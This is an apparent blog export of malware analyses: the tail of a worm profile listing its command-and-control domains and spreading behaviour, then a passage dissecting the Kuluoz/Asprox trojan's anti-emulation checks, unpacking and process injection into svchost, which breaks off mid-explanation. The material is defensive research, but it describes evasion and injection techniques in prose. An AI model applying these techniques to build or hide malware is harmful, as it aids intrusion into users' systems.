%USERPROFILE%\<RandomFileName>.exe (malware dropped copy)<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<i><b><span style="font-family: inherit;">Backdoor/Bot/Stealer</span></b></i></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Communicates to/from</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
</div>
<ul>
<li><span style="font-family: inherit;">Attempts to connect to ns1.player1352.com</span></li>
<li><span style="font-family: inherit;">Attempts to connect to ns1.player1352.net</span></li>
<li><span style="font-family: inherit;">Attempts to connect to
ns1.player1352.org</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><b><i>Propagates</i></b><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Method of spreading</i>: copies itself
into removable and mapped network drives.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>General Malware</b></i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Summary of payload</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 1in;">
</div>
<ul>
<li><span style="font-family: inherit;">drops malware copies to removable
and mapped network drives</span></li>
<li><span style="font-family: inherit;">modifies TerminateProcess and
TerminateThread APIs loaded in task manager or process explorer to prevent them
from terminating vobfus malware</span></li>
<li><span style="font-family: inherit;">may attempt to connect to outside
address in order to download updated copy of itself</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><b><i>Pertinent APIs used</i></b><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">advapi32<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">CloseHandle<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">connect<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">CreateToolhelp32Snapshot<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">GetDiskFreeSpaceExW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">GetDriveTypeW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">GetFileAttributesW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">GetLocaleInfoW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">GetLogicalDrives<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">GetLogicalDriveStringsW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">CreateMutexW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">GetModuleHandleW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">GetUserNameW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">ExitProcess<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">htons<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">InternetCloseHandle<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">InternetOpenUrlW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">InternetOpenW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">InternetReadFile<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">kernel32<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">OpenProcess<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">Process32First<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">recv<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">shell32<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">ShellExecuteW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">SHGetSpecialFolderPathW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">Sleep<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">socket<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">TerminateProcess<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">user32<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">wininet<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">WriteProcessMemory<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">WSAAsyncSelect<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">WSAStartup<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">ws2_32<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">RegCreateKeyExW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">RegSetValueExW<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;">RegCloseKey<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><b><i>What makes it unique</i></b>:
Visual Basic compiled and obfuscation techniques</span></div>
</div>
<div style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">
<br /></div>
</span></span></div>
Anonymoushttp://www.blogger.com/profile/10653752703445056399noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-85341205472989218742014-04-28T00:03:00.000-07:002014-04-28T00:07:23.778-07:00DISSECTING KULUOZ<h2>
<span style="font-size: large;">Introduction</span></h2>
<h2>
<div class="MsoNormal">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Kuluoz, or commonly known as Asprox by some
antivirus vendors, is a Trojan <a href="http://en.wikipedia.org/wiki/Botnet" target="_blank">botnet</a><span id="goog_811557424"></span><span id="goog_811557425"></span><a href="https://www.blogger.com/"></a>
that is usually distributed thru spam emails.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: small; font-weight: normal;">This variant of kuluoz was first seen in
our malware database on the 4<sup>th</sup> of April 2014.</span><o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVXK34hOfoKHpHmGH35aNIkZ2PbHar1qU58Wh2ahDY_cQhyZb2EkitLCH0-PgEbvBSRASkz-OXkWAhlrWVOW6b1k2CaSn3aVh9Yp2x71joyAJtM-EvbH-AzpSuo-FKwz8iTMc1VHG9/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVXK34hOfoKHpHmGH35aNIkZ2PbHar1qU58Wh2ahDY_cQhyZb2EkitLCH0-PgEbvBSRASkz-OXkWAhlrWVOW6b1k2CaSn3aVh9Yp2x71joyAJtM-EvbH-AzpSuo-FKwz8iTMc1VHG9/s1600/1.png" /></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">Kuluoz imitating a word
document<o:p></o:p></span></span></i></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">It spoofs the icon of a Microsoft Word
document in an attempt to fool the user in executing it.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<br /></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">The most common and obvious <a href="http://en.wikipedia.org/wiki/Indicator_of_compromise">indicators of
compromise</a> (IOC) of kuluoz on an infected system are:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-weight: normal;"><span style="font-size: small;"><span lang="EN-US" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman';">
</span></span><!--[endif]--><span lang="EN-US">Presence of an 8-lowercase-random
filename with a word document icon located in %USERPROFILE%\Local
Settings\Application Data<o:p></o:p></span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKt10e6fzB6J9zdZHjV8x2PCK9sB73uGBGI0LaSc74UUkY9Ibze7VjZLdoqMso00a2WwVxa6PVaBLQq-jJTdie70l9TFul3Z_76HfzplGE4ABF9_nJOmnmwFK7gYRy7GjU05z-KbFv/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKt10e6fzB6J9zdZHjV8x2PCK9sB73uGBGI0LaSc74UUkY9Ibze7VjZLdoqMso00a2WwVxa6PVaBLQq-jJTdie70l9TFul3Z_76HfzplGE4ABF9_nJOmnmwFK7gYRy7GjU05z-KbFv/s1600/2.png" height="148" width="320" /></a></div>
<div align="center" class="MsoNoSpacing" style="margin-left: .5in; text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">Kuluoz in
%USERPROFILE%\Local Settings\Application Data</span></span></i></div>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-weight: normal;"><span style="font-size: small;"><span lang="EN-US" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman';">
</span></span><!--[endif]--><span lang="EN-US">Presence of an autorun entry
located in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
pointing to the botnet’s executable image<o:p></o:p></span></span></span></div>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-weight: normal;"><span style="font-size: small;"><span lang="EN-US" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman';">
</span></span><!--[endif]--><span lang="EN-US"> An SVCHOST.EXE process can be seen running
under Explorer.exe</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAUIoaoDrz5d2Rap6RVsaZwPJR0Py0uaMdpa7NeuGNq3NiDlWRMY8ElMn54JQ7IJTRreW5ZT3jYF7bcVsITfiAEANFWIN4v48llp5D9vB6jHdmJUh7a002wi-JNyQrnaVkPTB959iX/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAUIoaoDrz5d2Rap6RVsaZwPJR0Py0uaMdpa7NeuGNq3NiDlWRMY8ElMn54JQ7IJTRreW5ZT3jYF7bcVsITfiAEANFWIN4v48llp5D9vB6jHdmJUh7a002wi-JNyQrnaVkPTB959iX/s1600/3.png" height="131" width="320" /></a></div>
<div align="center" class="MsoNoSpacing" style="margin-left: .5in; text-align: center;">
<i><span lang="EN-US"><span style="font-weight: normal;"><span style="font-size: small;">Copy of SVCHOST.EXE
injected with kuluoz</span></span><o:p></o:p></span></i></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<br /></div>
</h2>
<h3>
<span lang="EN-US"><span style="font-size: large;">Breaking Into Bits and Pieces </span></span></h3>
<h4>
<i><span lang="EN-US" style="font-family: inherit;">UNPACKING ROUTINE:</span></i></h4>
<h2>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The unpacker section of kuluoz needs to
meet two conditions in order to properly continue its execution.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US"><span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">First is the existence of
“HKEY_CLASSES_ROOT\ typelib\{640d3148-a423-11d2-b943-00c04f79d22f}\1.0” in
registry. If not found, it self terminates.</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOgbCUZz8LS91QEUWzo6bQ97oiDCoqNvE74XbFgx1T4WVWTF_hmvGcrHLF0vI6YXsExasF3WabzTowtbuxSq2aMPV2X8-4wJDsanxBRcI8YTiNBgZOdmaZN59UPtooDkOD08baG7Nx/s1600/Checks+for+a+specific+registry+entry.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOgbCUZz8LS91QEUWzo6bQ97oiDCoqNvE74XbFgx1T4WVWTF_hmvGcrHLF0vI6YXsExasF3WabzTowtbuxSq2aMPV2X8-4wJDsanxBRcI8YTiNBgZOdmaZN59UPtooDkOD08baG7Nx/s1600/Checks+for+a+specific+registry+entry.png" height="42" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Checks for a specific
registry entry<o:p></o:p></span></span></i></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">And second, the height of the target
machine’s full screen window on the primary monitor in pixels should be greater
than 500 pixels.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWc0q3IuDAfsdqjb-ZxcVVJ0xC-XKrKxzU1FCJVGboQdz-YGBKChYNnPyKuaMBLVp84jJROelUD1NhFzwHjlzBOiljSQ7_xmRNpb-rxVcHigsnaYvWXHa3d2OvtRGTgbb_BMDN3vjx/s1600/Checks+screen+height+if+greater+than+500+pixels.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWc0q3IuDAfsdqjb-ZxcVVJ0xC-XKrKxzU1FCJVGboQdz-YGBKChYNnPyKuaMBLVp84jJROelUD1NhFzwHjlzBOiljSQ7_xmRNpb-rxVcHigsnaYvWXHa3d2OvtRGTgbb_BMDN3vjx/s1600/Checks+screen+height+if+greater+than+500+pixels.png" height="44" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Checks screen height if
greater than 500 pixels<o:p></o:p></span></span></i></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Then what happens if the height of the window
falls short of 500 pixels? A debug exception occurs, and again the Trojan
terminates.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">As a reader you might ask, "What is
the purpose of kuluoz doing these two checks?". Simple answer, kuluoz
assumes that by calling these fake APIs some antivirus engines may fail in
emulation, thus successfully bypassing its heuristic/generic detections.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">An encrypted data within its body
(starting at 0x40F003) with a size of 0x12300 bytes is then copied and
decrypted in memory using <i>VirtualAlloc</i>. After which, execution is
then transferred.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then gets the image base of
kernel32.dll by parsing its value in <a href="http://en.wikipedia.org/wiki/Win32_Thread_Information_Block">Win32 Thread
Information Block</a> (TIB). In turn, it then populates its API table based
from the image base of kernel32.dll.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The following imported APIs that are to
be populated are listed below.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualAlloc<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">UnmapViewofFile<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualProtect<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">LoadLibraryExA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetModuleHandleA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateFileA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">SetFilePointer<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WriteFile<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CloseHandle<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetTempPathA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">lstrenA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">lstrcatA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Once again, it will make use of <i>VirtualAlloc </i>to
allocate a memory region for itself to copy and decrypt a part of its code.
This time the data that is decrypted in memory contains an MZ-PE header.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyFFPiV396e5l7gcoM-i7Qls96brgkwgwEOsM1LHUdn1KUSX2e3wpPrp7CLw2_F-1UZrbVPRM5wZgjkKfB5X_KErJ1Ibjh0Oxvn5tZp3fm9aPwG4v6amcqLhyphenhyphenFkhLDe4zConRFwCGb/s1600/An+MZ-PE+file+copied+and+decrypted+in+memory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyFFPiV396e5l7gcoM-i7Qls96brgkwgwEOsM1LHUdn1KUSX2e3wpPrp7CLw2_F-1UZrbVPRM5wZgjkKfB5X_KErJ1Ibjh0Oxvn5tZp3fm9aPwG4v6amcqLhyphenhyphenFkhLDe4zConRFwCGb/s1600/An+MZ-PE+file+copied+and+decrypted+in+memory.png" height="104" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">An MZ-PE file copied and
decrypted in memory<o:p></o:p></span></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"> <o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then proceeds to fix the import table
of the said PE file in memory and looks for the values of the following APIs
that it needs to use:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WaitForSingleObject<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateEventA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualAlloc<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateProcessA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetProcAddress<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetModuleHandleA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CloseHandle<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ReleaseMutex<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">TerminateProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetCurrentProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetLastError<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateMutexA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">This newly decrypted PE file is then
overwritten to the memory region of the original executable before transferring
execution.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-size: small;">You can dump this into a new file and we
have successfully created an unprotected version of Kuluoz!</span></span><o:p></o:p></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
</h2>
<h4>
<i><span lang="EN-US"><span style="font-family: inherit; font-size: small;">PROCESS INJECTION
(INJECTING THE MODULE):</span></span></i></h4>
<h2>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Kuluoz creates a mutex name of
“2GVWNQJz1” to prevent duplicate process of it running in memory.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScUajZOiDJJV51Yqshw_P7oh6gN0-_rO4e8zVLp6QkzONqGKpMqeBhR6Ae8k5URSogSLYW8bNaJqzOsjlf7Sw9gfIETOmlYTdbjz81n1TZVtYZvg4QG9fpcY0MJQ0tmA9KVDgofLL/s1600/%25E2%2580%259C2GVWNQJz1%25E2%2580%259D+as+mutex+name.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScUajZOiDJJV51Yqshw_P7oh6gN0-_rO4e8zVLp6QkzONqGKpMqeBhR6Ae8k5URSogSLYW8bNaJqzOsjlf7Sw9gfIETOmlYTdbjz81n1TZVtYZvg4QG9fpcY0MJQ0tmA9KVDgofLL/s1600/%25E2%2580%259C2GVWNQJz1%25E2%2580%259D+as+mutex+name.png" height="23" width="320" /></span></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">“2GVWNQJz1” as mutex name<o:p></o:p></span></span></i></div>
<div class="MsoNormal" style="text-indent: .25in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then proceeds to gather all the
necessary APIs that it needs, which are listed below:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">NtQueryInformationProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwReadVirtualMemory<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwMapViewOfSection<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">NtCreateSection<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwUnmapViewOfSection<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwResumeThread<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Next it will inject a portion of its dll
code to a normal process “SVCHOST.EXE”.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">By doing so, kuluoz successfully made
itself to stay memory resident unknowingly to the user.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">I will explain in detail how this
process injection is done.<o:p></o:p></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><span lang="EN-US">First, it spawns a suspended process of
svchost.exe in memory using</span><span class="apple-converted-space"><span lang="EN-US"> </span></span><i><span lang="EN-US">CreateProcessA.</span></i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
